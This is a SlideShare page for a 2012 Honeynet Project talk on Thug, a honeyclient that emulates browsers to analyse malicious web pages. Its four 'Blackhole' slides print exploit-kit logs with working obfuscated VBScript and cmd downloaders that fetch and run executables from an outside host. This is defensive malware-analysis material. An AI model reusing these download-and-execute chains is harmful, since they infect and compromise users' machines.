SlideShare a Scribd company logo

Thug: a new low-interaction honeyclient

Angelo Dell'Aera
Angelo Dell'Aera

Honeynet Project Security Workshop - San Francisco Bay Area, March 19th 2012

1 of 23
Download to read offline
Thug: a new low-interaction honeyclient Angelo Dell'Aera
Speaker  Full Member @ Honeynet Project since 2009  Senior Threat Analyst @ Security Reply (8 years)  Information Security Independent Researcher @ Antifork Research (10+ years)
Agenda  Introduction  Honeyclient technologies  Thug  Future work
New trends, new tools  In the last years more and more attacks against client systems  The browser is the most popular client system deployed on every user system  A lot of vulnerabilities are identified daily and reported in the most used browsers and in third- party plugins
New trends, new tools  The browser is currently the preferred way to own an host  The end user is the weakest link of the security chain  New tools are required to learn more about such client-side attacks
Honeyclients  What we need is something which seems like a real browser the same way as a classical honeypot system seems like a real vulnerable server  A real system (high-interaction honeyclient) or an emulated one (low-interaction honeyclient)?
Low-interaction honeyclients Strengths:  Different browser versions (“personalities”)  Different ActiveX and plugins modules (even different versions)  Much more safer  Much more scalable Weakness:  Easy to detect
High-interaction honeyclients Strengths:  No emulation necessary  Accurate classification  Ability to detect zero-day attacks  More difficult to evade Weaknesses:  Just one version for browser and plugins  Dangerous  More computationally expensive
Brief History  First version of PhoneyC released in 2009  Started contributing (and learning) in November 2009  Started thinking about a new design during the first months of 2011  Here comes Thug... 82c455dbe44bc1688622a1b606ebac7198b8c2e7 Author: Angelo Dell'Aera <angelo.dellaera@honeynet.org> Date: Sun May 8 15:18:00 2011 +0200 First commit
Document Object Model (DOM) “The Document Object Model is a platform- and language-neutral interface that will allow programs and scripts to dynamically access and update the content, structure and style of documents. The document can be further processed and the results of that processing can be incorporated back into the presented page.”  Thug DOM is (almost) compliant with W3C DOM Core and HTML specifications (Level 1, 2 and partially 3) and partially compliant with W3C DOM Events and Style specifications  Designed with the requirement that adding the missing features has to be as simple as possible  Much more effective than chasing exploit writers!
Browser Personalities  Currently supported personalities:  Internet Explorer 6.0 (Windows XP)  Internet Explorer 6.1 (Windows XP)  Internet Explorer 7.0 (Windows XP)  Internet Explorer 8.0 (Windows XP)  Internet Explorer 6.0 (Windows 2000)  Internet Explorer 8.0 (Windows 2000)  And adding new personalities is really easy...
Javascript  Google V8 Javascript engine wrapped through PyV8  “V8 implements ECMAScript as specified in ECMA-262, 5th edition, and runs on Windows, Mac OS X , and Linux systems that use IA-32, x64, or ARM processors”  “The V8 API provides functions for compiling and executing scripts, accessing C++ methods and data structures, handling errors, and enabling security checks”  Abstract Syntax Tree generation and inspection (static analysis)  Context inspection (dynamic analysis)  A lot of other potentially interesting features (GDB JIT interface, live objects inspection, code disassembler, etc.) exported through a clean and well designed API
Vulnerability Modules  Python-based vulnerability modules  ActiveX controls  Core browser functionalities  Browser plugins
Analysis  Static analysis  Abstract Syntax Tree (AST)  Static attack signatures  “Interesting” breakpoints identification for later dynamic analysis  Dynamic analysis  V8 debugger protocol  Libemu integration (shellcode detection and emulation)
Logging • MITRE MAEC logging format • “Flat” log files (not so exciting maybe...) • MongoDB • HPFeeds  thug.events channel (URL analysis results published in MAEC format)  thug.files channel (downloaded samples)
Future work  Document Object Model improvements  Javascript dynamic analysis improvements  Full integration with HPFeeds infrastructure  Exploit kits identification?  VBScript dynamic analysis?  Malicious PDF, JAR, SWF analysis?  Anomaly-based approach?
Blackhole - 1/4 $ python thug.py -v "hxxp://myapp-ups.com/main.php?page=898e350e1897a478" [2012-03-06 15:51:06] <applet archive="hxxp://myapp-ups.com/content/GPlugin.jar" code="Inc.class"><param name="p" test="12" valu="12" value="vssMlggUk7MMahMzPJFUgYPMvM-Vc/oAd/G6cr"></param></applet> [2012-03-06 15:51:07] Saving applet hxxp://myapp-ups.com/content/GPlugin.jar [2012-03-06 15:51:07] <param name="p" test="12" valu="12" value="vssMlggUk7MMahMzPJFUgYPMvM- Vc/oAd/G6cr"></param> [2012-03-06 15:51:07] Unknown ActiveX Object: shockwaveflash.shockwaveflash.15 [2012-03-06 15:51:07] Unknown ActiveX Object: shockwaveflash.shockwaveflash.14 [2012-03-06 15:51:07] Unknown ActiveX Object: shockwaveflash.shockwaveflash.13 [2012-03-06 15:51:07] Unknown ActiveX Object: shockwaveflash.shockwaveflash.12 [2012-03-06 15:51:07] Unknown ActiveX Object: shockwaveflash.shockwaveflash.11 [2012-03-06 15:51:07] [Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (adodb.stream) [2012-03-06 15:51:07] [Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (Shell.Application) [2012-03-06 15:51:07] [Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (msxml2.XMLHTTP) [2012-03-06 15:51:07] [Microsoft XMLHTTP ActiveX] Fetching from URL hxxp://myapp-ups.com/w.php?f=97d19&e=2 [2012-03-06 15:51:08] [Microsoft XMLHTTP ActiveX] Saving File: eed88603a141913f83bb58b4eacc88cf [2012-03-06 15:51:08] [Microsoft XMLHTTP ActiveX] send [2012-03-06 15:51:08] [Adodb.Stream ActiveX] open [2012-03-06 15:51:08] [Adodb.Stream ActiveX] Write [2012-03-06 15:51:08] [Adodb.Stream ActiveX] SaveToFile (.//..//467f705.exe) [2012-03-06 15:51:08] [Adodb.Stream ActiveX] Close [2012-03-06 15:51:08] [Shell.Application ActiveX] ShellExecute command: .//..//467f705.exe [2012-03-06 15:51:08] [Navigator URL Translation] ./content/ap1.php?f=97d19 --> hxxp://myapp- ups.com/content/ap1.php?f=97d19
Blackhole - 2/4 [2012-03-06 15:51:09] Microsoft Internet Explorer HCP Scheme Detected [2012-03-06 15:51:09] Microsoft Windows Help Center Malformed Escape Sequences Incorrect Handling [2012-03-06 15:51:09] [AST]: Eval argument length > 64 [2012-03-06 15:51:09] [Windows Script Host Run] Command: cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","hxxp://myapp- ups.com/content/hcp_vbs.php?f=97d19&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "" + B > %TEMP%l.vbs && %TEMP%l.vbs && taskkill /F /IM helpctr.exe [2012-03-06 15:51:09] [Windows Script Host Run - Stage 1] Code: cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","hxxp://myapp- ups.com/content/hcp_vbs.php?f=97d19&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "" + B > %TEMP%l.vbs && %TEMP%l.vbs && taskkill /F /IM helpctr.exe [2012-03-06 15:51:09] [Windows Script Host Run - Stage 1] Downloading from URL hxxp://myapp- ups.com/content/hcp_vbs.php?f=97d19&d=0 [2012-03-06 15:51:09] [Windows Script Host Run - Stage 1] Saving file 2eceb44e291417dc613739fb258e0ac0
Blackhole - 3/4 [2012-03-06 15:51:09] [Windows Script Host Run - Stage 2] Code: w=3000:x=200:y=1:z=false:a = "hxxp://myapp-ups.com/w.php?e=5&f=97d19":Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")):Set f=e.GetSpecialFolder(2):b = f & "exe.ex2":b=Replace(b,Month("2010-02-16"),"e"):OT = "GET":Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):Set d = CreateObject(StrReverse("maertS.BDODA")) Set o=Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")) On Error resume next c.open OT, a, z:c.send() If c.Status = x Then d.Open:d.Type = y:d.Write c.ResponseBody:d.SaveToFile b:d.Close End If Set w=CreateObject(StrReverse("llehS." & "tpi"&"rcSW")) Eval(Replace("W.ex2c b", Month("2010-02-16"), "E")) W.eXeC "taskkill /F /IM wm" & "player.exe":W.eXeC "taskkill /F /IM realplay.exe":Set g=o.GetFile(e.GetSpecialFolder(2) & "" & StrReverse("bv.l") & "s"):g.Delete:WScript.Sleep w:Set g=o.GetFile(b):Eval("g.Delete") [2012-03-06 15:51:09] [Windows Script Host Run - Stage 2] Downloading from URL hxxp://myapp-ups.com/w.php? e=5&f=97d19 [2012-03-06 15:51:09] [Windows Script Host Run - Stage 2] Saving file eed88603a141913f83bb58b4eacc88cf
Blackhole - 4/4 [2012-03-06 15:51:18] <param name="movie" value="content/field.swf"></param> [2012-03-06 15:51:18] [Navigator URL Translation] content/field.swf --> hxxp://myapp-ups.com/content/field.swf [2012-03-06 15:51:18] Saving remote content at content/field.swf (MD5: 027ddef75ff4f692196e0461756c3deb) [2012-03-06 15:51:18] <param name="allowScriptAccess" value="always"></param> [2012-03-06 15:51:18] <param name="Play" value="0"></param> [2012-03-06 15:51:18] <embed allowscriptaccess="always" height="10" id="swf_id" name="swf_id" src="content/field.swf" type="application/x-shockwave-flash" width="10"></embed> [2012-03-06 15:51:18] [Navigator URL Translation] content/field.swf --> hxxp://myapp-ups.com/content/field.swf [2012-03-06 15:51:18] Saving remote content at content/field.swf (MD5: 027ddef75ff4f692196e0461756c3deb) [2012-03-06 15:51:18] Saving log analysis at ../logs/a201092c67a6fecf301a09f8dae985b2/20120306155105
References  Jose Nazario, “PhoneyC: A virtual client honeypot” (LEET 2009)  The Honeynet Project, “Know Your Enemy: Malicious Web Servers” (http://www.honeynet.org/papers)  Google V8 Javascript engine (http://code.google.com/p/v8/)  PyV8 (http://code.google.com/p/pyv8/)  Libemu (http://libemu.carnivore.it/)  Pylibemu (https://github.com/buffer/pylibemu)
Publicly available? Really?! Thug source code will be released just after this presentation! Download it at https://github.com/buffer/thug Comments and feedback welcome!
Thanks for the attention! Questions? Angelo Dell'Aera <angelo.dellaera@honeynet.org>

Recommended

MongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB
 
GWT Introduction and Overview - SV Code Camp 09
GWT Introduction and Overview - SV Code Camp 09GWT Introduction and Overview - SV Code Camp 09
GWT Introduction and Overview - SV Code Camp 09Fred Sauer
 
George Thiruvathukal, User Experiences with Plone Content Management
George Thiruvathukal, User Experiences with Plone Content Management George Thiruvathukal, User Experiences with Plone Content Management
George Thiruvathukal, User Experiences with Plone Content Management webcontent2007
 
Bh europe-01-grossman
Bh europe-01-grossmanBh europe-01-grossman
Bh europe-01-grossmananiba2000
 
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...Xlator
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
From 0 to Spring Security 4.0
From 0 to Spring Security 4.0From 0 to Spring Security 4.0
From 0 to Spring Security 4.0robwinch
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012ZIONSECURITY
 

Recommended

MongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB
 
GWT Introduction and Overview - SV Code Camp 09
GWT Introduction and Overview - SV Code Camp 09GWT Introduction and Overview - SV Code Camp 09
GWT Introduction and Overview - SV Code Camp 09Fred Sauer
 
George Thiruvathukal, User Experiences with Plone Content Management
George Thiruvathukal, User Experiences with Plone Content Management George Thiruvathukal, User Experiences with Plone Content Management
George Thiruvathukal, User Experiences with Plone Content Management webcontent2007
 
Bh europe-01-grossman
Bh europe-01-grossmanBh europe-01-grossman
Bh europe-01-grossmananiba2000
 
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...
Jim Manico: Developer Top 10 Core Controls, web application security @ OWASP ...Xlator
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
From 0 to Spring Security 4.0
From 0 to Spring Security 4.0From 0 to Spring Security 4.0
From 0 to Spring Security 4.0robwinch
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012ZIONSECURITY
 
Laporan multi client
Laporan multi clientLaporan multi client
Laporan multi clientichsanbarokah
 
iOS Masque Attack
iOS Masque AttackiOS Masque Attack
iOS Masque AttackMinded Security
 
Intro to Apache Shiro
Intro to Apache ShiroIntro to Apache Shiro
Intro to Apache ShiroClaire Hunsaker
 
Breaking .net through serialization
Breaking .net through serializationBreaking .net through serialization
Breaking .net through serializationNet Drive
 
Hacking the Grails Spring Security 2.0 Plugin
Hacking the Grails Spring Security 2.0 PluginHacking the Grails Spring Security 2.0 Plugin
Hacking the Grails Spring Security 2.0 PluginBurt Beckwith
 
ApacheCon 2014: Infinite Session Clustering with Apache Shiro & Cassandra
ApacheCon 2014: Infinite Session Clustering with Apache Shiro & CassandraApacheCon 2014: Infinite Session Clustering with Apache Shiro & Cassandra
ApacheCon 2014: Infinite Session Clustering with Apache Shiro & CassandraDataStax Academy
 
Busy Developer's Guide to Windows 8 HTML/JavaScript Apps
Busy Developer's Guide to Windows 8 HTML/JavaScript AppsBusy Developer's Guide to Windows 8 HTML/JavaScript Apps
Busy Developer's Guide to Windows 8 HTML/JavaScript AppsJAX London
 
JSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons LearnedJSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons LearnedKazuho Oku
 
Repaso rápido a los nuevos estándares web
Repaso rápido a los nuevos estándares webRepaso rápido a los nuevos estándares web
Repaso rápido a los nuevos estándares webPablo Garaizar
 
Super simple application security with Apache Shiro
Super simple application security with Apache ShiroSuper simple application security with Apache Shiro
Super simple application security with Apache ShiroMarakana Inc.
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
Html5 - Awesome APIs
Html5 - Awesome APIsHtml5 - Awesome APIs
Html5 - Awesome APIsDragos Ionita
 
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0Cyber Security Alliance
 
Persistant Cookies and LDAP Injection
Persistant Cookies and LDAP InjectionPersistant Cookies and LDAP Injection
Persistant Cookies and LDAP InjectionMaulikLakhani
 
Java Secure Coding Practices
Java Secure Coding PracticesJava Secure Coding Practices
Java Secure Coding PracticesOWASPKerala
 
201410 2 fiware-orion-contextbroker
201410 2 fiware-orion-contextbroker201410 2 fiware-orion-contextbroker
201410 2 fiware-orion-contextbrokerFIWARE
 
Evolving your Data Access with MongoDB Stitch
Evolving your Data Access with MongoDB StitchEvolving your Data Access with MongoDB Stitch
Evolving your Data Access with MongoDB StitchMongoDB
 
Frontends w ithout javascript
Frontends w ithout javascriptFrontends w ithout javascript
Frontends w ithout javascriptStephen Lorello
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorizationGiulio De Donato
 
powershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-londonpowershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-londonnettitude_labs
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Stephan Chenette
 
Honeynet Project Workshop 2014 - Thug: a low-interaction honeyclient
Honeynet Project Workshop 2014 - Thug: a low-interaction honeyclientHoneynet Project Workshop 2014 - Thug: a low-interaction honeyclient
Honeynet Project Workshop 2014 - Thug: a low-interaction honeyclientAngelo Dell'Aera
 

More Related Content

What's hot

Laporan multi client
Laporan multi clientLaporan multi client
Laporan multi clientichsanbarokah
 
Breaking .net through serialization
Breaking .net through serializationBreaking .net through serialization
Breaking .net through serializationNet Drive
 
Hacking the Grails Spring Security 2.0 Plugin
Hacking the Grails Spring Security 2.0 PluginHacking the Grails Spring Security 2.0 Plugin
Hacking the Grails Spring Security 2.0 PluginBurt Beckwith
 
ApacheCon 2014: Infinite Session Clustering with Apache Shiro & Cassandra
ApacheCon 2014: Infinite Session Clustering with Apache Shiro & CassandraApacheCon 2014: Infinite Session Clustering with Apache Shiro & Cassandra
ApacheCon 2014: Infinite Session Clustering with Apache Shiro & CassandraDataStax Academy
 
Busy Developer's Guide to Windows 8 HTML/JavaScript Apps
Busy Developer's Guide to Windows 8 HTML/JavaScript AppsBusy Developer's Guide to Windows 8 HTML/JavaScript Apps
Busy Developer's Guide to Windows 8 HTML/JavaScript AppsJAX London
 
JSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons LearnedJSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons LearnedKazuho Oku
 
Repaso rápido a los nuevos estándares web
Repaso rápido a los nuevos estándares webRepaso rápido a los nuevos estándares web
Repaso rápido a los nuevos estándares webPablo Garaizar
 
Super simple application security with Apache Shiro
Super simple application security with Apache ShiroSuper simple application security with Apache Shiro
Super simple application security with Apache ShiroMarakana Inc.
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
Html5 - Awesome APIs
Html5 - Awesome APIsHtml5 - Awesome APIs
Html5 - Awesome APIsDragos Ionita
 
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0Cyber Security Alliance
 
Persistant Cookies and LDAP Injection
Persistant Cookies and LDAP InjectionPersistant Cookies and LDAP Injection
Persistant Cookies and LDAP InjectionMaulikLakhani
 
Java Secure Coding Practices
Java Secure Coding PracticesJava Secure Coding Practices
Java Secure Coding PracticesOWASPKerala
 
201410 2 fiware-orion-contextbroker
201410 2 fiware-orion-contextbroker201410 2 fiware-orion-contextbroker
201410 2 fiware-orion-contextbrokerFIWARE
 
Evolving your Data Access with MongoDB Stitch
Evolving your Data Access with MongoDB StitchEvolving your Data Access with MongoDB Stitch
Evolving your Data Access with MongoDB StitchMongoDB
 
Frontends w ithout javascript
Frontends w ithout javascriptFrontends w ithout javascript
Frontends w ithout javascriptStephen Lorello
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorizationGiulio De Donato
 
powershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-londonpowershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-londonnettitude_labs
 

What's hot (20)

Laporan multi client
Laporan multi clientLaporan multi client
Laporan multi client
 
iOS Masque Attack
iOS Masque AttackiOS Masque Attack
iOS Masque Attack
 
Intro to Apache Shiro
Intro to Apache ShiroIntro to Apache Shiro
Intro to Apache Shiro
 
Breaking .net through serialization
Breaking .net through serializationBreaking .net through serialization
Breaking .net through serialization
 
Hacking the Grails Spring Security 2.0 Plugin
Hacking the Grails Spring Security 2.0 PluginHacking the Grails Spring Security 2.0 Plugin
Hacking the Grails Spring Security 2.0 Plugin
 
ApacheCon 2014: Infinite Session Clustering with Apache Shiro & Cassandra
ApacheCon 2014: Infinite Session Clustering with Apache Shiro & CassandraApacheCon 2014: Infinite Session Clustering with Apache Shiro & Cassandra
ApacheCon 2014: Infinite Session Clustering with Apache Shiro & Cassandra
 
Busy Developer's Guide to Windows 8 HTML/JavaScript Apps
Busy Developer's Guide to Windows 8 HTML/JavaScript AppsBusy Developer's Guide to Windows 8 HTML/JavaScript Apps
Busy Developer's Guide to Windows 8 HTML/JavaScript Apps
 
JSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons LearnedJSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons Learned
 
Repaso rápido a los nuevos estándares web
Repaso rápido a los nuevos estándares webRepaso rápido a los nuevos estándares web
Repaso rápido a los nuevos estándares web
 
Super simple application security with Apache Shiro
Super simple application security with Apache ShiroSuper simple application security with Apache Shiro
Super simple application security with Apache Shiro
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
 
Html5 - Awesome APIs
Html5 - Awesome APIsHtml5 - Awesome APIs
Html5 - Awesome APIs
 
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
 
Persistant Cookies and LDAP Injection
Persistant Cookies and LDAP InjectionPersistant Cookies and LDAP Injection
Persistant Cookies and LDAP Injection
 
Java Secure Coding Practices
Java Secure Coding PracticesJava Secure Coding Practices
Java Secure Coding Practices
 
201410 2 fiware-orion-contextbroker
201410 2 fiware-orion-contextbroker201410 2 fiware-orion-contextbroker
201410 2 fiware-orion-contextbroker
 
Evolving your Data Access with MongoDB Stitch
Evolving your Data Access with MongoDB StitchEvolving your Data Access with MongoDB Stitch
Evolving your Data Access with MongoDB Stitch
 
Frontends w ithout javascript
Frontends w ithout javascriptFrontends w ithout javascript
Frontends w ithout javascript
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorization
 
powershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-londonpowershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-london
 

Similar to Thug: a new low-interaction honeyclient

Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Stephan Chenette
 
Honeynet Project Workshop 2014 - Thug: a low-interaction honeyclient
Honeynet Project Workshop 2014 - Thug: a low-interaction honeyclientHoneynet Project Workshop 2014 - Thug: a low-interaction honeyclient
Honeynet Project Workshop 2014 - Thug: a low-interaction honeyclientAngelo Dell'Aera
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS UniverseStefano Di Paola
 
eXploitable Markup Language
eXploitable Markup LanguageeXploitable Markup Language
eXploitable Markup Languagesghctoma
 
Eurosec2014 - An introduction to honeyclient technologies
Eurosec2014 - An introduction to honeyclient technologiesEurosec2014 - An introduction to honeyclient technologies
Eurosec2014 - An introduction to honeyclient technologiesAngelo Dell'Aera
 
A Taste of Java ME
A Taste of Java MEA Taste of Java ME
A Taste of Java MEwiradikusuma
 
.NET Debugging Tips and Techniques
.NET Debugging Tips and Techniques.NET Debugging Tips and Techniques
.NET Debugging Tips and TechniquesBala Subra
 
.Net Debugging Techniques
.Net Debugging Techniques.Net Debugging Techniques
.Net Debugging TechniquesBala Subra
 
qooxdoo - Open Source Ajax Framework
qooxdoo - Open Source Ajax Frameworkqooxdoo - Open Source Ajax Framework
qooxdoo - Open Source Ajax Frameworkecker
 
Stateful mock servers to the rescue on REST ecosystems
Stateful mock servers to the rescue on REST ecosystemsStateful mock servers to the rescue on REST ecosystems
Stateful mock servers to the rescue on REST ecosystemsNuno Caneco
 
Internet Explorer 8
Internet Explorer 8Internet Explorer 8
Internet Explorer 8David Chou
 
DevTools
DevToolsDevTools
DevToolsboucher
 
webOS App by Example: Sorting Thoughts
webOS App by Example: Sorting ThoughtswebOS App by Example: Sorting Thoughts
webOS App by Example: Sorting ThoughtsHendrik Ebel
 
Intro to mobile web application development
Intro to mobile web application developmentIntro to mobile web application development
Intro to mobile web application developmentzonathen
 
1 introduction of android
1 introduction of android1 introduction of android
1 introduction of androidakila_mano
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedMinded Security
 
MokE: a tool for Mobile-ok evaluation of Web Content
MokE: a tool for Mobile-ok evaluation of Web ContentMokE: a tool for Mobile-ok evaluation of Web Content
MokE: a tool for Mobile-ok evaluation of Web ContentYeliz Yesilada
 

Similar to Thug: a new low-interaction honeyclient (20)

Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
 
Honeynet Project Workshop 2014 - Thug: a low-interaction honeyclient
Honeynet Project Workshop 2014 - Thug: a low-interaction honeyclientHoneynet Project Workshop 2014 - Thug: a low-interaction honeyclient
Honeynet Project Workshop 2014 - Thug: a low-interaction honeyclient
 
(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe(In)Security Implication in the JS Universe
(In)Security Implication in the JS Universe
 
eXploitable Markup Language
eXploitable Markup LanguageeXploitable Markup Language
eXploitable Markup Language
 
Eurosec2014 - An introduction to honeyclient technologies
Eurosec2014 - An introduction to honeyclient technologiesEurosec2014 - An introduction to honeyclient technologies
Eurosec2014 - An introduction to honeyclient technologies
 
A Taste of Java ME
A Taste of Java MEA Taste of Java ME
A Taste of Java ME
 
.NET Debugging Tips and Techniques
.NET Debugging Tips and Techniques.NET Debugging Tips and Techniques
.NET Debugging Tips and Techniques
 
.Net Debugging Techniques
.Net Debugging Techniques.Net Debugging Techniques
.Net Debugging Techniques
 
qooxdoo - Open Source Ajax Framework
qooxdoo - Open Source Ajax Frameworkqooxdoo - Open Source Ajax Framework
qooxdoo - Open Source Ajax Framework
 
Stateful mock servers to the rescue on REST ecosystems
Stateful mock servers to the rescue on REST ecosystemsStateful mock servers to the rescue on REST ecosystems
Stateful mock servers to the rescue on REST ecosystems
 
Html5
Html5Html5
Html5
 
Internet Explorer 8
Internet Explorer 8Internet Explorer 8
Internet Explorer 8
 
DevTools
DevToolsDevTools
DevTools
 
webOS App by Example: Sorting Thoughts
webOS App by Example: Sorting ThoughtswebOS App by Example: Sorting Thoughts
webOS App by Example: Sorting Thoughts
 
Intro to mobile web application development
Intro to mobile web application developmentIntro to mobile web application development
Intro to mobile web application development
 
1 introduction of android
1 introduction of android1 introduction of android
1 introduction of android
 
Html5
Html5Html5
Html5
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession Learned
 
Build 2019 Recap
Build 2019 RecapBuild 2019 Recap
Build 2019 Recap
 
MokE: a tool for Mobile-ok evaluation of Web Content
MokE: a tool for Mobile-ok evaluation of Web ContentMokE: a tool for Mobile-ok evaluation of Web Content
MokE: a tool for Mobile-ok evaluation of Web Content
 

Thug: a new low-interaction honeyclient

  • 1. Thug: a new low-interaction honeyclient Angelo Dell'Aera
  • 2. Speaker  Full Member @ Honeynet Project since 2009  Senior Threat Analyst @ Security Reply (8 years)  Information Security Independent Researcher @ Antifork Research (10+ years)
  • 3. Agenda  Introduction  Honeyclient technologies  Thug  Future work
  • 4. New trends, new tools  In the last years more and more attacks against client systems  The browser is the most popular client system deployed on every user system  A lot of vulnerabilities are identified daily and reported in the most used browsers and in third- party plugins
  • 5. New trends, new tools  The browser is currently the preferred way to own an host  The end user is the weakest link of the security chain  New tools are required to learn more about such client-side attacks
  • 6. Honeyclients  What we need is something which seems like a real browser the same way as a classical honeypot system seems like a real vulnerable server  A real system (high-interaction honeyclient) or an emulated one (low-interaction honeyclient)?
  • 7. Low-interaction honeyclients Strengths:  Different browser versions (“personalities”)  Different ActiveX and plugins modules (even different versions)  Much more safer  Much more scalable Weakness:  Easy to detect
  • 8. High-interaction honeyclients Strengths:  No emulation necessary  Accurate classification  Ability to detect zero-day attacks  More difficult to evade Weaknesses:  Just one version for browser and plugins  Dangerous  More computationally expensive
  • 9. Brief History  First version of PhoneyC released in 2009  Started contributing (and learning) in November 2009  Started thinking about a new design during the first months of 2011  Here comes Thug... 82c455dbe44bc1688622a1b606ebac7198b8c2e7 Author: Angelo Dell'Aera <angelo.dellaera@honeynet.org> Date: Sun May 8 15:18:00 2011 +0200 First commit
  • 10. Document Object Model (DOM) “The Document Object Model is a platform- and language-neutral interface that will allow programs and scripts to dynamically access and update the content, structure and style of documents. The document can be further processed and the results of that processing can be incorporated back into the presented page.”  Thug DOM is (almost) compliant with W3C DOM Core and HTML specifications (Level 1, 2 and partially 3) and partially compliant with W3C DOM Events and Style specifications  Designed with the requirement that adding the missing features has to be as simple as possible  Much more effective than chasing exploit writers!
